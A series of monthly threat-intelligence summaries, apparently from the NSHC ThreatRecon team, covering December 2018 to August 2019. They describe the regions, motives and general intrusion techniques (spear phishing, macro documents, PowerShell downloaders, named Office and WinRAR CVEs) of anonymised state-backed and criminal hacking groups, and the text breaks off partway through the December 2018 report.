Monthly Threat Actor Group Intelligence Report, August 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from July 21 to August 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA04 and SectorA07 were found among SectorA hacking groups this August. Two parallel requirements of SectorA hacking groups are collecting high-quality information related to South Korean political and diplomatic activities and to obtain illegal monetary benefit by targeting anywhere in the world.

SectorA01 group activity was found in South Korea, the Philippines, Argentina, Pakistan, United States and Nepal. SectorA02 group activity has been found in South Korea and the United States. SectorA4 group, which had not been found for a while, was found in South Korea, and malware was discovered using a digital signature issued by a Korean security company. Sector07 group activity was found in South Korea, Indonesia, United States, Russian Federation and Germany.

The activities of the four SectorA-related hacking groups discovered in August common use Spear Phishing as an attack vector. However, SectorA01 uses Hangul files (HWP) as attachments in South Korea, and only other SectorA02, SectorA04, and SectorA07 groups use Microsoft Word files containing macro function as an attachment to its Spear Phishing emails.

The SectorA02 group produces mobile malware designed to run on Android smartphones and uses it for hacking activities.

The SectorA groups aim to seize high-level information related to South Korea’s political, diplomatic and North Korean relief organizations. Due to large-scale economic sanctions surrounding SectorA, their hacking groups carry out hacking activities to steal financial information in other countries, including South Korea. These operations take place in parallel. and SectorA groups are expected to continue hacking with the purpose.

2. SectorB Activity Features

Among the SectorB groups, a total of five hacking groups, SectorB01, SectorB03, SectorB04, SectorB06 and SectorB07 group were found among SectorB hacking groups this August.

The hacking activity range of the SectorB01 group discovered so far has been the widest in the history of this hacking group. Their activity was found in Asia (including South Korea, Japan, Singapore, Vietnam, Malaysia, Hong Kong, Taiwan, Thailand, Myanmar, India), the Middle East (Turkey) and Africa (including South Africa), North America (including the United States and Canada) and Europe (including France, United Kingdom, Ireland, Germany, Switzerland, Netherlands, Italy, Czech republic, and Ukraine).

SectorB03 group activity was found in the United Arab Emirates, the United States, Japan and Taiwan.

SectorB04 group activity was found in Russian Federation, United States, United Kingdom, Turkey, Spain, South Korea, Malaysia and Taiwan.

The SectorB06 group has been found in the Russian Federation and Belarus.

SectorB07 group has been found in South Korea, Germany, United States and India.

Most of the SectorB hacking groups use Spear Phishing with document files as attachments to exploit vulnerabilities in Microsoft Office.

SectorB group’s hacking activities discovered in August are mostly concentrated in Asia, Europe and North America, and this is closely linked to its activities to obtain information about its country’s diplomatic and economic information related to an ongoing trade war with the United States.

3. SectorC Activity Features

Among the SectorC groups, the activities of three hacking groups, SectorC02, SecotorC03 and SectorC08 were found among SectorC hacking groups this August.

The hacking activity of SectorC02 group has been found in Brazil, Georgia.

The hacking activity of SectorC03 group has been found in United States and United Kingdom.

The hacking activity of SectorC08 group has been found in Ukraine, United Kingdom, Belarus, Sweden, Argentina, United States and China.

The SectorC groups used different attack vectors. SectorC02 group stole sensitive email information from internal Microsoft Exchange servers connected to the Internet while the SecotorC03 and SectorC08 groups used spear phishing emails with malware as their primary hacking technique, similar to their other hacking activities found in the past.

However, the SectorC08 group has the characteristic of using 7ZipSfx compressed files as attachments to specific hacking targets.

The SectorC groups have many more attack technique at their disposal than threat actors of other groups because of their long history. Recently, they have been working to achieve the political objectives of their government, and this is expected to continue.

4. SectorD Activity Features

Among the SectorD groups, the activities of two hacking groups, SectorD02, SecotorD14 were found among SectorD hacking groups this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

5. SectorE Activity Features

Among the SectorE groups, the activities of three hacking groups, SectorE01, SecotorE02 and SectorE04 were found among SectorE hacking groups this August.

The hacking activity of SectorE01 group was found in Poland, Germany and the United Kingdom.

The hacking activity of SectorE02 group was found in Pakistan, United Kingdom, United States, Ukraine, Netherlands and the Germany.

The hacking activity of SectorE04 was found in China.

SectorE hacking groups have mainly been conducting hacking activities targeting countries that are politically competitive with SectorE group’s government, but the range of geographical hacking activities of these groups is gradually widening.

The hacking groups discovered in August mainly used spear phishing, attaching document files that exploited known Microsoft Word vulnerabilities or containing malicious macro code.

The SectorE groups are expanding their range of activity, and their recent activities have been found frequently in East Asia. In addition, it is highly likely that they will continue to develop new hacking techniques by copying techniques of other hacking groups or through their own research process.

6. SectorF Activity Features

August hacking activity of the SectorF01 group has been found in Cambodia, China, South Korea, Japan, United States, Ireland, Russian Federation, and Australia. They used malware that is highly similar to the ones found in the past, and spear phishing emails with document files containing malicious macro code as attachments are sent to their targets.

In the past, there have been many cases where their hacking activity have been discovered in the Southeast Asia region, and recently, their hacking activities have been carried out for the purpose of economic development of their country. The hacking activity radius of this hacking group is expected to gradually increase and it is necessary to continue further analysis based on their hacking activity areas and targets.

7. Cyber Crime Activity Features

In August, a total of six hacking groups, SectorJ01, SectorJ04, SectorJ07, SectorJ10, SectorJ12 and SectorJ13, were found among the Cyber Crime Groups. Unlike other government-backed hacking groups, they collect information such as Credit Card information that can be monetized in the real world. They also hack organizations to spread ransomware on their internal network, or steal important industry secrets to sell them online.

The hacking activity of SectorJ01 group has been found in the Russian Federation, Romania, United Kingdom, Costa Rica and United States. The SectorJ01 Group is conducting hacking campaigns in Europe and North America this August. They collect various types of personal and corporate information that exists inside infected PCs from malware distributed through the spear phishing email.

The hacking activity of SectorJ04 group has been found in United Kingdom, United States, South Korea, Germany, Turkey, France, Bulgaria, Serbia, India, Canada, Argentina, Bangladesh and Hong Kong. They mainly hack into companies in various industries including transportation, universities, government agencies, manufacturing, semiconductors, online commercials, chemicals, and health. In the first half of 2019, they intensively hacked organizations in Asia, but their recent trend seems to be to move hacking activity back to Europe and North America.

The hacking activity of SectorJ07 group has been found in China, United States and Ukraine. They mainly produce malware that runs on Linux that can mine cryptocurrencies on high-performance servers utilized by companies.

The hacking activity of SectorJ10 group has been found in Philippines and United States. Attacks are carried out using spear phishing emails containing malware in the form of document files which have malicious macro code included inside. The macro calls to the Windows Management Instrumentation Command-line (WMIC), and the WMIC finally executes a malicious PowerShell script.

SectorJ12 group conducted hacking activities targeting energy, entertainment, consulting and manufacturing companies located in France, Taiwan and Poland. The spear phishing email have an ACE archive attached, and this ACE archive contains the Visual Basic Script (VBScript) for getting the malicious PowerShell script from the attacker’s server.

The hacking activity of SectorJ13 group has been found in South Korea, Ukraine and United Kingdom. They send spear phishing emails with document files containing malicious macro code attached. When executing the Word document, the macro script uses a technique to download additional malware from the attacker’s server by running PowerShell. SectorJ13 was previously only active in Europe, but its activity was recently found in Korea as well. This is a group that needs to be watched closely if it is targeting South Korea with similar intent and purpose as the SectorJ04 group.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, SectorA05 were found among SectorA hacking groups this June. The SectorA group was mainly active in the Middle East, Southeast Asia, and East Asia in June, targeting countries such as Jordan, Philippines, South Korea, and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are active mainly for monetary profit but based on their hacking techniques and malware features, each groups are aimed at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, but the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails which attached malicious HWP or executable files. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to target both diplomatic information related to their government and gain monetary benefits. In the past, they mainly targeted financial companies and cryptocurrency exchanges in order to earn monetary benefits. but nowadays they extended their range of hacking targets to include individual holders of cryptocurrency. Attention is needed as their range of activities expand.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six hacking groups were found to be active in SectorB. Activities of each group were found in the following countries: SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, Netherlands, and Ukraine. SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia. SectorB04 group activity was discovered in East Asia, Middle East and Europe, mainly in Taiwan, Philippines, Turkey, and Austria. SectorB06 group activity was discovered in the Middle East, mainly in Turkey and Kazakhstan. SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada. SectorB14 group activity was discovered in East Asia and North America, mainly in the South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08, SectorC11 were found among the SectorC groups in June. They were active mainly in Europe – Moldova, Ukraine and Germany – where they frequently have political friction with. They are constantly using spear phishing emails with malware, but there are gradual changes in the characteristics of the attached executable files. They continue to use open source programs such as the remote control programs, UltraVNC, and start to develop their malware with open source code. This is presumably done to bypass security solutions and analyst detection, and also interferes with intelligence analysis efforts to track attackers. SectorC groups are expected to continue hacking activities in countries which it has political and diplomatic conflicts with for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among SectorD groups. They targeted countries in the Middle East which they have a politically competitive relation with. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively in Middle Asia to Middle East, mainly in Hong Kong, Sweden, Tajikistan, United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, United States and Mexico. SectorD11 group activity was discovered in Middle Asia to Middle East.

They are constantly using spear phishing emails attached to Microsoft Office document files. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilian who are against SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This is mainly targeting the United States, which they have political and military disputes with, but also a pro-American nation in the Middle East. It is likely that the activities of SectorD hacking groups will be greatly dependent on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, United Kingdom and the United States. They have consistently used spear phishing emails with attached Microsoft Office document files, but recently attached compressed files containing obfuscated HTA script files as well. This bypasses the detection of security solutions using script-based malware and avoids making the target suspicious as it launches normal documents when running the HTA file.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-tech info from advanced countries that are nurturing high-tech and industrial technologies, which assists their government’s economic development and upgrading purposes. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage is increasing, and it is likely that their activities targeting high tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to be active as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in Southeast Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office document files.

In this case, macro scripts within document files make use of PowerShell to download additional scripts from Pastebin (a text file storage site). This minimize the exposure of their next stage payload even if their initial malware is detected by a security solution, and can bypass the detection of security solution by using an external web site which is open to the Internet for distribution of their malware. SectorH01 group’s hacking activities were mainly carried out on their political competitor, India. However, recently their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.

7. Cyber Crime Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In June, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group are mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, US, Brazil, and Costa Rica. The SectorJ01 group uses Spear Phishing emails which have attached documents that utilize known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

SectorJ04 Group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, France, South Korea, Philippines, Taiwan, China, USA, Ecuador, and Senegal.

Similar to the past, they use spear phishing emails which have attached Microsoft Office document files with embedded macro scripts that will download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets were not limited to just financial companies anymore. They have also extended their activities to industrial areas, where the security posture is typically relatively weaker compared to financial companies, so this is one way they are attempting to generate high profits through low effort. As SectorJ04 group’s hacking targets are diversified, it is likely that many cases of financial losses will occur in various countries across many industries.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, May 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from April 21 to May 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA07 were found among SectorA hacking groups this May. Analysis of the hacking campaigns of SectorA groups over a long period of time reveals that SectorA02, SectorA05 and the newly defined SectorA07 are the most active. The increase in activity of these three groups means that the strategy, hacking purpose and direction of the entire SectorA groups are clarified. In addition, it means that the goals of each group in SectorA is now clear.

In the past, SectorA02 and Sector05 groups conducted hacking campaigns to collect advanced information related to Korea. However, these groups are currently conducting hacking campaigns to gather information on political activities in Europe, North America, and Southeast Asia, where countries that can influence the political and diplomatic activities of the SectorA government are located.

In May, the newly defined SectorA07 group was a small subgroup of the larger existing SectorA05 group. As a result of analyzing their hacking campaigns, we found that the SectorA07 group is active only for the purpose of collecting financial information from companies located in countries such as South Korea and Southeast Asia.

The SectorA02 group uses the most diverse hacking strategies and techniques in SectorA. They develop and utilize a variety of hacking strategies and techniques such as simple phishing attacks, spear phishing attacks with malware, and sophisticated social engineering techniques using KakaoTalk (a popular messenger in South Korea). On the other hand, SectorA05 and SectorA07 focused on utilizing spear phishing, which was used frequently in the past, for initial access. They use Microsoft Word or HWP file format malware selectively depending on their target victim.

We observe that SectorA is targeting specific countries less and now gathering political and economic activity information of various countries related to the SectorA government and capturing financial information in a variety of non-specific countries and regions.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In May, a total of four hacking groups were found to be active in SectorB.

In the Middle East and Southeast Asia, the activity of SectorB01 which had a low activity frequency over the past period has started to increase. The SectorB01 group used Microsoft Word files containing code execution vulnerabilities to execute malware. These files were attached to their spear phishing emails, and this technique was frequently used by other SectorB groups in the past. In May, the SectorB01 group was also found using malware that runs on the Linux operating system and it seems they are preparing their capabilities for attacks on various operating systems.

The SectorB03 group, mainly acting in North America, used the remote code execution vulnerability CVE-2019-0604 to attack Microsoft SharePoint servers, which was not used by other hacking groups in the past. They attempted to exploit the vulnerability in order to penetrate the internal network by uploading a WebShell to the target server.

SectorB09 group mainly operates in East Asia, and they use malware with characteristics similar to those used in the past. However, they are using a new hacking technique as they are masquerading their malware as a setup file of a commercial cloud service and then distributing malware to specific targets.

The SectorB16 group, acting mainly in Europe and Southeast Asia, uses only open source tools and known existing vulnerabilities. This characteristics make it more difficult to detect their hacking activity.

SectorB groups are likely to conduct hacking activities to seize relevant diplomatic information as part of a recent trade war with the United States. As a result, the frequency of SectorB group hacking campaigns is expected to increase.

3. SectorC Activity Features

In May, a total of three hacking groups were found among the SectorC groups. They perform hacking activities mainly in Europe, South America, and Eastern Europe where political friction is frequent.

The SectorC01 group mainly utilized malware recently produced in the GO language for this month. This seems to be a strategic choice because the GO programming language has heterogeneous portability and high utilization.

The SectorC02 group installs information-collecting malware which targets Microsoft Exchange Servers. This is similar to malware used in hacking campaigns in countries located in Europe in the past, and seems to be aimed at stealing e-mail information that can be used for various purposes.

The SectorC08 group conducts intensive hacking activities targeting countries in Eastern Europe where political friction continues. The malicious code found in May was in the form of an executable compressed file, 7ZipSFX, which has the characteristics of using both script files and known normal files together. This is similar to the activities of the SectorC08 group found in the past.

4. SectorD Activity Features

In May, a total of two hacking groups were found among SectorD groups. They perform hacking activities mainly on other Middle Eastern countries which they have political tensions with.

The SectorD01 group mainly conducted hacking activities for the purpose of collecting information using spear phishing emails with Microsoft Excel files that contain malicious macros, and malware using AutoHotKey and TeamViewer, both of which they have not used in the past.

The SectorD02 group also conducted hacking campaigns in the Middle East. They used spear phishing with malware for initial access, just like most other Sector groups. Recently, they used open-source penetration testing tools in their attacks, which seems to be an attempt to not leave traces of attack activity.

5. SectorE Activity Features

In May, a total of three hacking groups were found among SectorE groups. They perform hacking activities mainly against their rival countries in Central Asian, including Pakistan.

The SectorE02 group typically used spear phishing emails with an attached Microsoft Excel document with malicious macro scripts for initial access.

The SectorE05 group also used Microsoft Word malware for hacking activities, with the internals of these Word files including two files with OLE structures and two files with executable file structures.

Hacking campaigns of SectorE hacking groups have been concentrated against their competitor countries after a military physical conflict with a political rival country. Due to this political situation, the hacking campaigns of SectorE groups are expected to continue.

6. SectorF Activity Features

In May, the SectorF01 group mainly operated against China, Thailand, Cambodia and India. In addition, hacking campaigns targeting Japan automotive companies located in Southeast Asia were also found.

The SectorF01 group uses a variety of attack methods constantly: executable files disguised as document file icons, MS Word documents containing VBA macro scripts, RTF files exploiting the CVE-2017-11882 vulnerability, and WinRAR ACE Vulnerability (CVE-2018-20250). Recent hacking activities of the SectorF01 group seems to be for different purposes from the past, as they now also hack various countries and organizations for the economic development of their own country as opposed to only for political and military information.

This type of hacking activity is similar to previous attempts of another sector, SectorB, to collect technology information of Western countries in order advance their own technology and economic development. It appears that the SectorF01 group will continue to target various advanced countries and high technology industries for these purposes.

7. Cyber Crime Groups Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In May, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ04 group were mainly found in Italy, Korea, Romania, South Africa and India, and are targeted at major companies in the financial industry such as banks. The group mainly uses malware in the form of an MS Excel file containing macros script and they are using different malware and strategies across Europe and Asia.

The SectorJ09 group hacking activities observed were for hijacking credit card payment information for e-commerce platforms used in online stores in North America and universities in the US and Canada.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Monthly Threat Actor Group Intelligence Report, April 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from March 21 to April 20, 2019.


1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA06 were found among SectorA hacking groups this April.

The scope of activity for SectorA groups found in April is much larger than in the past. Previously, their targets were mainly in East Asia and North America, but now includes many more targets around the world. Traces of hacking activities have been found in the Middle East, including Israel, Turkey and Palestine, East Asia including China and South Korea, Eastern Europe including Ukraine and Slovenia, Southeast Asia including Sri Lanka and Vietnam, and North America including the United States.

The techniques used in their hacking activities found were basically using Spear Phishing techniques with a Hangul Word Process (HWP) file or Microsoft Word file depending on the target person or organization. We also observed them using the recently discovered WinRAR vulnerability. In addition, a case of Watering Hole attack was found.

For targets in East Asia, including South Korea, their aim was stealing information related to politics and diplomacy, as well as at stealing financial information represented by virtual currencies. Elsewhere, they were concerned with military information related to military weapons and stealing diplomatic information from countries engaged in diplomatic activities related to SectorA.

The scope of the hacking activities is expected to continue to expand in the future, as the hacking activities of SectorA hacking groups are being carried out for stealing military, diplomatic, political and financial information purposes.


2. SectorB Activity Features

A total of three hacking groups, SectorB01, SectorB06, and SectorB10 were found among SectorB hacking groups this April.

SectorB hacking groups hacking activities have been found in Europe including Russia, Portugal, Germany and France, and in Asia including Mongolia, Singapore, Japan, Taiwan, Vietnam and South Korea.

SectorB hacking groups had hacked the internal network of hardware and software manufacturers in East Asia, using Microsoft’s RTF file malware as an Spear Phishing attachment, including vulnerabilities that were frequently used in the past.

These Supply Chain Attacks were linked to cases involving malware in an online game update file developed by an online gaming company in East Asia in March.

They are likely to have done so because the difficulty of directly hacking their target organizations or staff was high enough to warrant other attack routes such as using Supply Chain Attacks to gain access to their targets instead.


3. SectorC Activity Features

A total of three hacking groups, SectorC01, SectorC02, and SectorC10 were found among SectorC hacking groups this April, with hacking activity targeted at countries in Europe and North America, including Britain, the United States, and Germany.

This April, SectorC hacking groups aimed at stealing information on political and diplomatic activities in European countries. They basically used Spear Phishing techniques with malware and tried to target the presidential elections in certain Eastern European countries.

In addition, SectorC10 hacking activity targeting ICS/SCADA environments has been discovered, and this group has various capabilities and tools, such as WebShells, Backdoors, and performing Credential Harvesting and Remote Command Execution.


4. SectorD Activity Features

A total of four hacking groups, SectorD01, SectorD02, SectorD05 and SectorD12 were found among SectorD hacking groups this April, with hacking activity targeted at countries in the Middle East, including the Sector’s political competitor Saudi Arabia, the United Arab Emirates, Jordan, Iraq and Turkey, and Ukraine, Estonia, Germany, and the United States, as well as South and East Asia.

SectorD hacking groups are basically using Spear Phishing techniques with malware and example phishing documents were word files using confidential U.S. State Department forms. At the same time, malware in the form of compressed files that abused the recently discovered WinRAR’s vulnerability were also found. SectorD hacking groups mainly collected political, military and diplomatic information from countries in the Middle East that are its political competitors.

However, with the recent declaration of noncompliance with some treaties of a Nuclear Agreement it is part of, hacking aimed at collecting information on government activities are expected to intensify as conflicts are expected with other countries in many areas, including politics and diplomacy.


5. SectorE Activity Features

A total of two hacking groups, SectorE02, and SectorE05 were found among SectorE hacking groups this April, with hacking activity targeted at countries including Pakistan, Bangladesh, Sri Lanka, Myanmar and Nepal.

SectorE hacking groups typically use Spear Phishing as a major hacking technique to attach web page links or Microsoft Excel documents containing VBA macro scripts to emails that mimic legitimate entities such as foreign governments, telecommunications and defense industries, or utilize malicious Microsoft Word files that exploit known code execution vulnerabilities.

The recent spate of military and physical clashes in Pakistan is feared to spread to cyberwarfare. Against this backdrop, the number of hacking activities in neighboring countries is increasing as countries seek to collect information on diplomatic activities related to Central and Southeast Asian countries.


6. SectorF Activity Features

One hacking group, SectorF01, was found among SectorF hacking groups this April, with hacking activity targeted at countries in Southeast Asia including Vietnam, Cambodia, and East Asia including Japan, China, and South Korea.

The SectorF01 Group has previously conducted hacking activities on Southeast Asian countries for its political and military interests, but these days it seems like they are also interested in hacking for economic interests.

Some of these changes in hacking purposes as mentioned earlier have also led to widespread hacking in Southeast Asia and East Asia.

The hacking techniques used by the SectorF01 Group range from watering hole attacks using scripted malicious code that exploits vulnerabilities to Spear phishing hacking techniques where malicious codes exist as attachments.

In addition, they have been using various hacking techniques, scenarios, and strategies to make malware that operates on Mac operating systems in addition to malware that operates on Windows operating systems.


7. Cyber Crime Groups Activity Features

A total of three groups, SectorJ02, SectorJ03 and SectorJ04, were found to be responsible for cybercriminal purposes this April.

The targeted areas where these hacking groups operate for cybercrime have been found in the Middle East including Palestine, the United Arab Emirates and Saudi Arabia, in the Netherlands, Luxembourg, Europe including Sweden, Macedonia, Russia and Italy, in North and South America, South Korea, Japan, Singapore, as well as in Asia and the United States and Mexico.

Those who hack for financial purposes are also found in a wide range of countries, and they have different purposes from those who are supported by a particular country. However, as of December 2018, SectorsJ03 and SectorJ04 groups have moved their hacking activities to countries in Asia.

For the purpose of cyber crime, hacking groups generally use Spear Phishing as their major hacking technique, and the attached malware mainly include macros written to perform malicious functions. In addition, they also attempt to use Windows-based malicious scripts such as PowerShell, VBScript, and BAT.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers.

Monthly Threat Actor Groups Intelligence Report, January 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from December 21, 2018 to January 20, 2019.


1. SectorA Activity Features

A total of three hacking groups were found to be active in SectorA. While their modus operandi had been constant for the past few months, some of it has changed this time.

SectorA01 is still concentrating on financial crime using malware in countries such as Africa, Southeast Asia, and South America for financial gain.

SectorA02 and SectorA05 groups are concentrating on hacking activities aimed at stealing information related to foreign policy of South Korea, and their malware continues to be found in government agencies within South Korea.

But little by little, these hacking groups supported by SectorA have been changing their malware and hacking techniques since 2018. For example, besides their using their usual spear phishing with Hangul Word Processor (HWP) files, they have also started to use phishing with malicious scripts instead as well.

From the hacking activities by SectorA to date, we believe they will continue their activities related to financial crime and espionage aimed at South Korean government agencies.


2. SectorB Activity Features

SectorB targets countries from various regions around the world, and a total of two hacking groups activity were found to be active. Targets were found in Central Asia including Kazakhstan and East Asia including South Korea.

Groups that were active continued to use spear phishing with Microsoft Word files containing Macros , and also included the use of code execution vulnerabilities in Microsoft Office software.

From the hacking activities by SectorB to date, we believe that their targets will continue to include European and Oceanian countries for the purpose of stealing high-tech information.


3. SectorC Activity Features

SectorC targets included countries in Eastern Europe including Ukraine, Poland, Macedonia, and North America including the United States. Three hacking groups were found to be active.

Although hacking groups supported by SectorC have the characteristics of having very fast technological and strategic changes, but their malware continues to have identifying characteristics of previous versions.

Their activities in Eastern Europe seem to be aimed at stealing information on military activities related to the North Atlantic Treaty Organization (NATO) and their activities in North America seem to be aimed at stealing information related to government activities.

Since SectorC is currently engaged in hacking activities in Eastern Europe and North America, it seems likely that their political and military related espionage will continue in those regions.


4. SectorD Activity Features

SectorD targets included Europe including Belarus, Ukraine, and Sweden, East Asia including South Korea, and the Middle East centering on Saudi Arabia, Turkey, and Oman. Two hacking groups were found to be active.

Outside of the Middle East, their purpose seem to be to steal diplomatic related information from countries with political and economic cooperation with other countries in the Middle East, such as Europe and East Asia. In particular, South Korea recently had diplomatic gains in which it agreed to cooperate in seven areas through summit talks with Qatar.

Hacking techniques used by SectorD continue to include spear phishing with Microsoft Word files which contains malicious macro functions.

Based on their hacking activities so far, it seems that SectorD is starting to expand its scope to include hacking countries with political and economic cooperating with Middle Eastern countries, rather than solely targeting countries in the Middle East.


5. SectorE Activity Features

SectorE targets included Pakistan like before, but this time included East Asia including China, Hong Kong, and South Korea. Two hacking groups were found to be active.

We believe that the wider range of hacking activities by SectorE groups are aimed at stealing information on economic and policy activities of the respective governments in East Asia. China is in the process of implementing “One Belt, One Road” in Southeast Asia, and South Korea and Russia are countries known to be exporting military arms to SectorE.

Hacking techniques used by SectorE continue to include spear phishing with Microsoft Word files which exploit known code execution vulnerabilities.

Based on their hacking activities so far, it seems that SectorE is targeting countries for the purpose of stealing information related to economic and foreign policy, and targeting Pakistan for politically motivated purposes.


6. SectorF Activity Features

SectorF targets were in Southeast Asia including Vietnam. Similar to November and December 2018, their purpose seems to be stealing information related to political activities from special-purpose personnel operating inside the countries of Southeast Asia.

The hacking techniques used by SectorF groups are using Spear Phishing with links to download malicious Microsoft Word files. Depending on the target, they choose to use code execution vulnerabilities or embed malicious macros in the Microsoft Word file.

From their hacking activities in the last three months, it seems that SectorF will continue to target special-purpose personnel in Vietnam and they will continue using other kinds of hacking techniques such as Watering Hole attacks as well.


7. SectorH Activity Features

SectorH seems to have a contractual relationship for a particular purpose rather than serving as a government organization of a particular country. Their recent hacking activities are extensive, ranging from Northern European countries including Lithuania to East Asian countries including China and South Korea.

However, it seems that the group is more focused on Cyber Crime activities to steal financial information based on their hacking techniques and malware, and only carries out hacking activities for stealing information related to political, economic and diplomatic government activity on an ad hoc basis.

Based on their hacking activities so far which has very different purposes and interests depending on the target, we will need to continue observing their hacking activity in order to have enough confidence to judge their primary purpose.


The full report detailing each event together with IOCs and recommendations is available to existing NSHC ThreatRecon customers.

Monthly Threat Actor Groups Intelligence Report, December 2018

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the Threat Recon Team, based on data and information collected from November 21 to December 20, 2018.


1. SectorA Activity Features

A total of four hacking groups were found to be active within SectorA.

Among this detected activity, SectorA05 activity was relatively more intense than others and all SectorA05 activity was highly related to political hacking aimed at South Korea.

There are two main purposes of hacking by SectorA for the month, which can be distinguished by activity aimed at Korea and activity aimed at other countries.

The first is hacking activity targeting financial institutions overseas, and virtual currency exchanges and individual traders in South Korea. This is used to overcome financial and economic sanctions that are currently ongoing against SectorA. The second is hacking activity related to the more traditional espionage aimed at stealing information related to South Korea’s political and diplomatic activities.

Although malware and hacking techniques used by SectorA differ depending on the target, SectorA consistently targets individuals who belong to target organizations by utilizing Spear Phishing with malicious documents attached.

One of their strategies, using Cloud services as their C2 server for hacking activities, is used against both overseas and South Korean targets.

Another strategy, utilizing malware in the form of document reader files, differs depending on the target – overseas targets receive traditional Microsoft Office files, while South Korean targets will receive Hangeul Word Processor (HWP) files regardless of whether they live in South Korea or overseas.


2. SectorB Activity Features

SectorB targets countries from various regions around the world, and a total of four hacking groups activity were found to be active.

Targets were found in the Oceania region including Australia, the European region including the United Kingdom, and the East Asian region including South Korea.

Among this detected activity, some malware that had been used in the past was modified, or malware produced based on open source code was used for hacking activities.

Like before, hacking activity targeted at South Korea utilized Spear Phishing, which included Microsoft Word files containing Macros, and our analysis of the malware used shows that this campaign started in early 2018. In addition, SectorB targets started to include South Korean financial companies.


3. SectorC Activity Features

A total of three hacking groups activity were found to be active within SectorC.

Among this detected activity, SectorC01 activity was relatively more intense than others and SectorC activity was found to be aimed at South Europe including Spain, East Asia including Japan, and Eastern Europe including Ukraine and Poland.

